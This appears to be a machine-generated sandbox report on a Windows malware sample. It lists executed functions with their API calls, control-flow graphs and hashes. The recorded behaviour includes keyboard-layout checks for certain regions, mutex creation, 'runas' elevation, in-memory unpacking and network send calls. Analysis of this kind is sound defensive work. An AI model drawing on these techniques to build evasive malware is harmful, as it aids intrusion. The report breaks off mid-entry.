Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59045->59046 59048 40db1f 59046->59048 59049 40d8f0 59047->59049 59050 4368c7 67 API calls 59048->59050 59049->59049 59052 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59049->59052 59051 40db25 59050->59051 59067 417a10 59051->59067 59060 40d90c 59052->59060 59055 417a50 Concurrency::details::_CancellationTokenState::_RegisterCallback 28 API calls 59056 40db55 59055->59056 59057 417a10 26 API calls 59056->59057 59062 40db68 59057->59062 59058 40daf2 ISource 59059 41d101 Concurrency::details::ScheduleGroupSegmentBase::StealUnrealizedChore 5 API calls 59058->59059 59061 40db13 59059->59061 59060->59058 59063 40db7b 59060->59063 59062->59063 59064 436739 23 API calls 59062->59064 59065 436d7a Concurrency::details::_CancellationTokenState::_RegisterCallback 25 API calls 59063->59065 59064->59063 59066 40db80 59065->59066 59068 417a30 59067->59068 59068->59068 59069 418110 Concurrency::details::_CancellationTokenState::_RegisterCallback 26 API calls 59068->59069 59070 40db3a 59069->59070 59070->59055

                    Executed Functions

                    Function 0040A9D9 Relevance: 50.5, APIs: 24, Strings: 4, Instructions: 1503COMMON
                    Download Yara Rule
                    APIs
                    • SetCurrentDirectoryA.KERNEL32(00000000,1F0F83C3,00000000), ref: 0040A9DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CurrentDirectory
                    • String ID: @3P$VUUU$hT2F$ht3F
                    • API String ID: 1611563598-2132849557
                    • Opcode ID: 5123107eb2995f2fe36b83faf7bb0f6a7537e4b13b0722997637141e4264aec4
                    • Instruction ID: 7686e5737b89a74435b9d98a5fabf4de63ad4f7b50ea679e9c4903c729b64dbd
                    • Opcode Fuzzy Hash: 5123107eb2995f2fe36b83faf7bb0f6a7537e4b13b0722997637141e4264aec4
                    • Instruction Fuzzy Hash: 59C2E4B1A002089FDB18DF28CD89BDDB775EF45304F1085AEE419A72D1DB399A84CF99
                    Function 004099D0 Relevance: 24.7, APIs: 16, Instructions: 668COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00408B00: GetTempPathA.KERNEL32(00000104,?,1F0F83C3,?,00000000), ref: 00408B47
                    • GetFileAttributesA.KERNEL32(00000000), ref: 00409A43
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFilePathTemp
                    • String ID:
                    • API String ID: 3199926297-0
                    • Opcode ID: 720b2ab1bd4a9574574f78251e76698971cee21b1115bf75c549fe42240a8655
                    • Instruction ID: 300cc23dac7bbdec6802486b90ae88e6198841c70d610ab3b66933c1455241e6
                    • Opcode Fuzzy Hash: 720b2ab1bd4a9574574f78251e76698971cee21b1115bf75c549fe42240a8655
                    • Instruction Fuzzy Hash: E342E370D00248DBEF14EBB8C6497DE7BB1AF06314F24426AD411773C2D7BD5A848BAA
                    Function 00407DA0 Relevance: 7.9, APIs: 5, Instructions: 388libraryloaderCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1009 407da0-407e22 call 434200 GetVersionExW 1012 407e28-407e50 call 417a50 call 405bc0 1009->1012 1013 40831e-40833b call 41d101 1009->1013 1020 407e52 1012->1020 1021 407e54-407e76 call 417a50 call 405bc0 1012->1021 1020->1021 1026 407e78 1021->1026 1027 407e7a-407e93 GetModuleHandleA GetProcAddress 1021->1027 1026->1027 1028 407ec4-407eef 1027->1028 1029 407e95-407ea4 1027->1029 1032 407f20-407f41 1028->1032 1033 407ef1-407f00 1028->1033 1030 407ea6-407eb4 1029->1030 1031 407eba-407ec1 call 41d773 1029->1031 1030->1031 1036 40833c call 436d7a 1030->1036 1031->1028 1034 407f43-407f45 GetNativeSystemInfo 1032->1034 1035 407f47 GetSystemInfo 1032->1035 1038 407f02-407f10 1033->1038 1039 407f16-407f1d call 41d773 1033->1039 1040 407f4d-407f56 1034->1040 1035->1040 1047 408341-408346 call 436d7a 1036->1047 1038->1036 1038->1039 1039->1032 1045 407f74-407f77 1040->1045 1046 407f58-407f5f 1040->1046 1050 407f7d-407f86 1045->1050 1051 4082bf-4082c2 1045->1051 1048 407f65-407f6f 1046->1048 1049 408319 1046->1049 1053 408314 1048->1053 1049->1013 1054 407f88-407f94 1050->1054 1055 407f99-407f9c 1050->1055 1051->1049 1056 4082c4-4082cd 1051->1056 1053->1049 1054->1053 1058 407fa2-407fa9 1055->1058 1059 40829c-40829e 1055->1059 1060 4082f4-4082f7 1056->1060 1061 4082cf-4082d3 1056->1061 1066 408089-408285 call 417a50 call 405bc0 call 417a50 call 405bc0 call 405d00 call 417a50 call 405bc0 call 4056e0 call 417a50 call 405bc0 call 417a50 call 405bc0 call 405d00 call 417a50 call 405bc0 call 4056e0 call 417a50 call 405bc0 call 417a50 call 405bc0 call 405d00 call 417a50 call 405bc0 call 4056e0 1058->1066 1067 407faf-40800b call 417a50 call 405bc0 call 417a50 call 405bc0 call 405d00 1058->1067 1064 4082a0-4082aa 1059->1064 1065 4082ac-4082af 1059->1065 1062 408305-408311 1060->1062 1063 4082f9-408303 1060->1063 1068 4082d5-4082da 1061->1068 1069 4082e8-4082f2 1061->1069 1062->1053 1063->1049 1064->1053 1065->1049 1071 4082b1-4082bd 1065->1071 1104 40828b-408294 1066->1104 1090 408010-408017 1067->1090 1068->1069 1073 4082dc-4082e6 1068->1073 1069->1049 1071->1053 1073->1049 1092 408019 1090->1092 1093 40801b-40803b call 438c61 1090->1093 1092->1093 1100 408072-408074 1093->1100 1101 40803d-40804c 1093->1101 1103 40807a-408084 1100->1103 1100->1104 1105 408062-40806f call 41d773 1101->1105 1106 40804e-40805c 1101->1106 1103->1104 1104->1051 1108 408296 1104->1108 1105->1100 1106->1047 1106->1105 1108->1059
                    APIs
                    • GetVersionExW.KERNEL32(0000011C,1F0F83C3), ref: 00407E1A
                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407E7B
                    • GetProcAddress.KERNEL32(00000000), ref: 00407E82
                    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F43
                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407F47
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                    • String ID:
                    • API String ID: 374719553-0
                    • Opcode ID: bf645a1796ace3e4da1679d878ac74b2a2a97ee8d9703dd8f91cffd96e297072
                    • Instruction ID: 784d6eb4ad79aa1e17a967bc2ef708f0396776d1d42dc3bf5217fbcf21c48606
                    • Opcode Fuzzy Hash: bf645a1796ace3e4da1679d878ac74b2a2a97ee8d9703dd8f91cffd96e297072
                    • Instruction Fuzzy Hash: 52D10870E00604EBDB14BB28CD4A39E7A71AB81714F5442AEE815773C2DB7D5E848BCB
                    Function 0043663B Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1316 43663b-436648 call 43a3a2 1319 43666a-436676 call 43667d ExitProcess 1316->1319 1320 43664a-436658 GetPEB 1316->1320 1320->1319 1321 43665a-436664 GetCurrentProcess TerminateProcess 1320->1321 1321->1319
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,0043663A,?,?,?,?,?,0043768E), ref: 0043665D
                    • TerminateProcess.KERNEL32(00000000,?,0043663A,?,?,?,?,?,0043768E), ref: 00436664
                    • ExitProcess.KERNEL32 ref: 00436676
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction ID: f65fa2cbf11c9341c6ec27041228dabd0dafc272b041e2f68e728e25dfebead6
                    • Opcode Fuzzy Hash: 4884c3d6b03f2585f6a3aa4756b085f7f7a66d5c8a7b369877bf872ade5703a9
                    • Instruction Fuzzy Hash: 54E08C31000608BFCF112F55DD0EE493B28FF08786F058425F80586232CB3ADC92CB89
                    Function 0296036E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1491 296036e-2960387 1492 2960389-296038b 1491->1492 1493 2960392-296039e CreateToolhelp32Snapshot 1492->1493 1494 296038d 1492->1494 1495 29603a0-29603a6 1493->1495 1496 29603ae-29603bb Module32First 1493->1496 1494->1493 1495->1496 1503 29603a8-29603ac 1495->1503 1497 29603c4-29603cc 1496->1497 1498 29603bd-29603be call 296002d 1496->1498 1501 29603c3 1498->1501 1501->1497 1503->1492 1503->1496
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02960396
                    • Module32First.KERNEL32(00000000,00000224), ref: 029603B6
                    Memory Dump Source
                    • Source File: 00000000.00000002.2275523481.000000000295F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0295F000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_295f000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateFirstModule32SnapshotToolhelp32
                    • String ID:
                    • API String ID: 3833638111-0
                    • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction ID: 728bf349075a5d65f064848aa27be32723c54e47c928abf0ee8f0e9efc0335e2
                    • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                    • Instruction Fuzzy Hash: 1EF062311007116BD7202AB598CDF7E76ECBF49625F141529E646D10C0DB70E8458A61
                    Function 0040B170 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameA.ADVAPI32(?,?), ref: 0040B1BD
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: a21137b5b85cae10e728cd7cf4b3e35a25e211850e38fb81cb08e2b5d5c66efc
                    • Instruction ID: a1e19f45e05bfbfc76289ed511d5f33cdcaaee103fe52927b7173f82fbb20f69
                    • Opcode Fuzzy Hash: a21137b5b85cae10e728cd7cf4b3e35a25e211850e38fb81cb08e2b5d5c66efc
                    • Instruction Fuzzy Hash: 68212CB191015CABDB29DF14CD65BEAB7B8FB09704F0042DDE50663181DB745B88CFA1
                    Function 00405BC0 Relevance: 23.2, APIs: 8, Strings: 5, Instructions: 435COMMON
                    Download Yara Rule

                    Control-flow Graph

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                    • API String ID: 0-3963862150
                    • Opcode ID: 34ebc3dd9a0bc791d95d53018ad29f9cf2716dfc3ee6d589c574769b2dcfbc3f
                    • Instruction ID: 76edcd2264c5843344100667b3f81de8b4abb57d1d227a43f18c015c8770d745
                    • Opcode Fuzzy Hash: 34ebc3dd9a0bc791d95d53018ad29f9cf2716dfc3ee6d589c574769b2dcfbc3f
                    • Instruction Fuzzy Hash: 6AF1E37090021CABEB24DF54CD49BDEBBB9EB44304F5041AEE409A72C1DB789AC4CF99
                    Function 00441B5C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 809 441b5c-441b8c call 4418aa 812 441ba7-441bb3 call 43beeb 809->812 813 441b8e-441b99 call 437610 809->813 819 441bb5-441bca call 437610 call 437623 812->819 820 441bcc-441c15 call 441815 812->820 818 441b9b-441ba2 call 437623 813->818 830 441e81-441e85 818->830 819->818 828 441c17-441c20 820->828 829 441c82-441c8b GetFileType 820->829 834 441c57-441c7d GetLastError call 4375ed 828->834 835 441c22-441c26 828->835 831 441cd4-441cd7 829->831 832 441c8d-441cbe GetLastError call 4375ed CloseHandle 829->832 837 441ce0-441ce6 831->837 838 441cd9-441cde 831->838 832->818 846 441cc4-441ccf call 437623 832->846 834->818 835->834 839 441c28-441c55 call 441815 835->839 842 441cea-441d38 call 43be36 837->842 843 441ce8 837->843 838->842 839->829 839->834 852 441d57-441d7f call 4415c2 842->852 853 441d3a-441d46 call 441a24 842->853 843->842 846->818 859 441d84-441dc5 852->859 860 441d81-441d82 852->860 853->852 858 441d48 853->858 861 441d4a-441d52 call 43afe8 858->861 862 441de6-441df4 859->862 863 441dc7-441dcb 859->863 860->861 861->830 866 441e7f 862->866 867 441dfa-441dfe 862->867 863->862 865 441dcd-441de1 863->865 865->862 866->830 867->866 869 441e00-441e33 CloseHandle call 441815 867->869 872 441e35-441e61 GetLastError call 4375ed call 43bffe 869->872 873 441e67-441e7b 869->873 872->873 873->866
                    APIs
                      • Part of subcall function 00441815: CreateFileW.KERNELBASE(00000000,00000000,?,00441C05,?,?,00000000,?,00441C05,00000000,0000000C), ref: 00441832
                    • GetLastError.KERNEL32 ref: 00441C70
                    • __dosmaperr.LIBCMT ref: 00441C77
                    • GetFileType.KERNELBASE(00000000), ref: 00441C83
                    • GetLastError.KERNEL32 ref: 00441C8D
                    • __dosmaperr.LIBCMT ref: 00441C96
                    • CloseHandle.KERNEL32(00000000), ref: 00441CB6
                    • CloseHandle.KERNEL32(0043AD32), ref: 00441E03
                    • GetLastError.KERNEL32 ref: 00441E35
                    • __dosmaperr.LIBCMT ref: 00441E3C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction ID: 112139b02b37b4a3a6abafbf4eec10d106d9ccfade03311548451970410361b9
                    • Opcode Fuzzy Hash: 5f6fa597f04e21c83b9050f74f27f75d912a23b265ca40419967d6c3ad7266dc
                    • Instruction Fuzzy Hash: E2A14A32A142458FEF19DF68DC91BAE3BA1EB0A324F14015EF811AB3A1D7399C42C759
                    Function 0040D74C Relevance: 13.9, APIs: 9, Instructions: 446networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 878 40d74c-40d755 879 40d786-40d8ed GetModuleFileNameA 878->879 880 40d757-40d766 878->880 892 40d8f0-40d8f5 879->892 881 40d768-40d776 880->881 882 40d77c-40d783 call 41d773 880->882 881->882 884 40db1a-40db74 call 436d7a call 4368c7 call 417a10 call 417a50 call 417a10 call 407320 881->884 882->879 919 40db7b-40db80 call 436d7a 884->919 921 40db76 call 436739 884->921 892->892 894 40d8f7-40dacb call 418110 call 419580 892->894 910 40dafc-40db19 call 41d101 894->910 911 40dacd-40dadc 894->911 915 40daf2-40daf9 call 41d773 911->915 916 40dade-40daec 911->916 915->910 916->915 916->919 921->919
                    APIs
                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0040D8C3
                    • CreateDirectoryA.KERNELBASE(00000000,00000000), ref: 0040D9DF
                    • send.WS2_32(?,?,00000004,00000000), ref: 0040DBDE
                    • send.WS2_32(?,?,00000008,00000000), ref: 0040DC1A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: send$CreateDirectoryFileModuleName
                    • String ID:
                    • API String ID: 2319890793-0
                    • Opcode ID: 626752a985912e68c41229b7841de364dc2e633fe692349d9defd2931ffdd168
                    • Instruction ID: db6d04ff986ec1ab9d9087d995072b3e4fab4856c6fac32bb73d1e3453718b91
                    • Opcode Fuzzy Hash: 626752a985912e68c41229b7841de364dc2e633fe692349d9defd2931ffdd168
                    • Instruction Fuzzy Hash: 96F11671E00218ABDB24DB68CC497DDB774AF45314F1042AEE419B72C2DB78AAC4CB99
                    Function 044C003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 925 44c003c-44c0047 926 44c004c-44c0263 call 44c0a3f call 44c0e0f call 44c0d90 VirtualAlloc 925->926 927 44c0049 925->927 942 44c028b-44c0292 926->942 943 44c0265-44c0289 call 44c0a69 926->943 927->926 945 44c02a1-44c02b0 942->945 947 44c02ce-44c03c2 VirtualProtect call 44c0cce call 44c0ce7 943->947 945->947 948 44c02b2-44c02cc 945->948 954 44c03d1-44c03e0 947->954 948->945 955 44c0439-44c04b8 VirtualFree 954->955 956 44c03e2-44c0437 call 44c0ce7 954->956 957 44c04be-44c04cd 955->957 958 44c05f4-44c05fe 955->958 956->954 961 44c04d3-44c04dd 957->961 962 44c077f-44c0789 958->962 963 44c0604-44c060d 958->963 961->958 967 44c04e3-44c0505 LoadLibraryA 961->967 965 44c078b-44c07a3 962->965 966 44c07a6-44c07b0 962->966 963->962 968 44c0613-44c0637 963->968 965->966 969 44c086e-44c08be LoadLibraryA 966->969 970 44c07b6-44c07cb 966->970 971 44c0517-44c0520 967->971 972 44c0507-44c0515 967->972 973 44c063e-44c0648 968->973 977 44c08c7-44c08f9 969->977 974 44c07d2-44c07d5 970->974 975 44c0526-44c0547 971->975 972->975 973->962 976 44c064e-44c065a 973->976 978 44c0824-44c0833 974->978 979 44c07d7-44c07e0 974->979 980 44c054d-44c0550 975->980 976->962 981 44c0660-44c066a 976->981 982 44c08fb-44c0901 977->982 983 44c0902-44c091d 977->983 989 44c0839-44c083c 978->989 984 44c07e4-44c0822 979->984 985 44c07e2 979->985 986 44c0556-44c056b 980->986 987 44c05e0-44c05ef 980->987 988 44c067a-44c0689 981->988 982->983 984->974 985->978 990 44c056d 986->990 991 44c056f-44c057a 986->991 987->961 992 44c068f-44c06b2 988->992 993 44c0750-44c077a 988->993 989->969 994 44c083e-44c0847 989->994 990->987 996 44c057c-44c0599 991->996 997 44c059b-44c05bb 991->997 998 44c06ef-44c06fc 992->998 999 44c06b4-44c06ed 992->999 993->973 1000 44c0849 994->1000 1001 44c084b-44c086c 994->1001 1008 44c05bd-44c05db 996->1008 997->1008 1002 44c06fe-44c0748 998->1002 1003 44c074b 998->1003 999->998 1000->969 1001->989 1002->1003 1003->988 1008->980
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 044C024D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2276060867.00000000044C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044C0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_44c0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: cess$kernel32.dll
                    • API String ID: 4275171209-1230238691
                    • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction ID: 13a13548b01468a0627bfc6816ce65ffb52e9b7f7dfdda236306ca4f6f7e078d
                    • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                    • Instruction Fuzzy Hash: 40526C74A01229DFDBA4CF98C984BADBBB1BF09304F1480DAE54DA7351DB30AA95DF14
                    Function 0040DA7C Relevance: 6.2, APIs: 4, Instructions: 168COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1143 40da7c-40da87 1144 40da89-40da97 1143->1144 1145 40da9d-40dacb call 41d773 1143->1145 1144->1145 1146 40db7b-40db80 call 436d7a 1144->1146 1152 40dafc-40db0e call 41d101 1145->1152 1153 40dacd-40dadc 1145->1153 1157 40db13-40db19 1152->1157 1155 40daf2-40daf9 call 41d773 1153->1155 1156 40dade-40daec 1153->1156 1155->1152 1156->1146 1156->1155
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 588b91b827282762ff0e3413d3fb34452fe767bcf4e4ff453577001b041af87e
                    • Instruction ID: 8b3fa60b4c4a2a692816cab4e7a6a6305bd65271537a877a075c62ae5821928f
                    • Opcode Fuzzy Hash: 588b91b827282762ff0e3413d3fb34452fe767bcf4e4ff453577001b041af87e
                    • Instruction Fuzzy Hash: DA41D6B2E041146BDB18DBB8CC85BAEB7B5AF45324F10077EE815E33D1EA749984CB49
                    Function 00416D80 Relevance: 6.0, APIs: 4, Instructions: 37threadsleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    APIs
                      • Part of subcall function 004099D0: Sleep.KERNELBASE(00000064), ref: 0040A933
                      • Part of subcall function 004099D0: CreateMutexA.KERNELBASE(00000000,00000000,00463224), ref: 0040A951
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A959
                      • Part of subcall function 004099D0: GetLastError.KERNEL32 ref: 0040A96A
                      • Part of subcall function 00405BC0: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,80000001,0000043f,00000008,00000423,00000008,00000422,00000008,00000419,00000008), ref: 0040612D
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016B80,00000000,00000000,00000000), ref: 00416D46
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016C10,00000000,00000000,00000000), ref: 00416D57
                    • CreateThread.KERNEL32(00000000,00000000,Function_00016CA0,00000000,00000000,00000000), ref: 00416D68
                    • Sleep.KERNEL32(00007530), ref: 00416D75
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Create$Thread$ErrorLastSleep$MutexOpen
                    • String ID:
                    • API String ID: 3966068485-0
                    • Opcode ID: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction ID: 31902ad575a48c38801987c82ff2dd8d9c076a2f2ea5494020ecf42ec81d45e6
                    • Opcode Fuzzy Hash: f5d0eeff358944ea3866414c35db1e035878ca345e6e00d6db8bbff552f4029d
                    • Instruction Fuzzy Hash: C6F0C975BD471475F13032A62C03F9A29145B04F65F320527B7587E1D299DCB4818AEF
                    Function 00407820 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 468sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1173 407820-407880 call 418790 call 418370 1178 407882-40788e 1173->1178 1179 4078ae-40792d call 417a50 * 2 call 405bc0 call 418110 call 407320 1173->1179 1180 407890-40789e 1178->1180 1181 4078a4-4078ab call 41d773 1178->1181 1204 40795b-407961 1179->1204 1205 40792f-40793b 1179->1205 1180->1181 1183 4079ea call 436d7a 1180->1183 1181->1179 1189 4079ef-407aba call 436d7a call 417a50 call 405bc0 call 418370 call 417a50 call 405bc0 call 418110 call 407320 1183->1189 1234 407ae4-407af5 Sleep 1189->1234 1235 407abc-407ac8 1189->1235 1209 407963-40796f 1204->1209 1210 40798b-4079a3 1204->1210 1207 407951-407958 call 41d773 1205->1207 1208 40793d-40794b 1205->1208 1207->1204 1208->1189 1208->1207 1215 407981-407988 call 41d773 1209->1215 1216 407971-40797f 1209->1216 1211 4079a5-4079b1 1210->1211 1212 4079cd-4079e9 call 41d101 1210->1212 1217 4079c3-4079ca call 41d773 1211->1217 1218 4079b3-4079c1 1211->1218 1215->1210 1216->1189 1216->1215 1217->1212 1218->1189 1218->1217 1236 407af7-407b03 1234->1236 1237 407b1f-407b38 call 41d101 1234->1237 1238 407ada-407ae1 call 41d773 1235->1238 1239 407aca-407ad8 1235->1239 1241 407b15-407b1c call 41d773 1236->1241 1242 407b05-407b13 1236->1242 1238->1234 1239->1238 1244 407b39 call 436d7a 1239->1244 1241->1237 1242->1241 1246 407b3e-407b8f call 436d7a call 406de0 1242->1246 1244->1246 1255 407b91 1246->1255 1256 407b93-407ba0 SetCurrentDirectoryA 1246->1256 1255->1256 1257 407ba2-407bae 1256->1257 1258 407bce-407c88 call 417a50 call 405bc0 call 417a50 call 405bc0 call 418370 call 418270 call 417a50 call 405bc0 call 418110 call 407320 1256->1258 1259 407bb0-407bbe 1257->1259 1260 407bc4-407bcb call 41d773 1257->1260 1290 407cb6-407cce 1258->1290 1291 407c8a-407c96 1258->1291 1259->1260 1262 407d88 call 436d7a 1259->1262 1260->1258 1268 407d8d call 436d7a 1262->1268 1272 407d92-407d97 call 436d7a 1268->1272 1292 407cd0-407cdc 1290->1292 1293 407cfc-407d14 1290->1293 1294 407c98-407ca6 1291->1294 1295 407cac-407cb3 call 41d773 1291->1295 1297 407cf2-407cf9 call 41d773 1292->1297 1298 407cde-407cec 1292->1298 1299 407d16-407d22 1293->1299 1300 407d3e-407d44 1293->1300 1294->1268 1294->1295 1295->1290 1297->1293 1298->1268 1298->1297 1305 407d34-407d3b call 41d773 1299->1305 1306 407d24-407d32 1299->1306 1301 407d46-407d52 1300->1301 1302 407d6e-407d87 call 41d101 1300->1302 1307 407d64-407d6b call 41d773 1301->1307 1308 407d54-407d62 1301->1308 1305->1300 1306->1268 1306->1305 1307->1302 1308->1272 1308->1307
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2274362925.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.2274362925.0000000000469000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: runas
                    • API String ID: 3472027048-4000483414
                    • Opcode ID: f2743ec9286650c7547dc49cd350320a0fa6e1949aab133e6c86d834e3d515ba
                    • Instruction ID: 9d19d4fe5d809e0f9ff9941f70a6e5c2266b8a13b716b69cce3286adae415981
                    • Opcode Fuzzy Hash: f2743ec9286650c7547dc49cd350320a0fa6e1949aab133e6c86d834e3d515ba
                    • Instruction Fuzzy Hash: 1CE11BB1E14144ABEB08EF78CD4679E7B719F41308F50815EF411A73C6DB7DAA40879A
                    Function 0040C366 Relevance: 3.5, APIs: 2, Instructions: 532sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
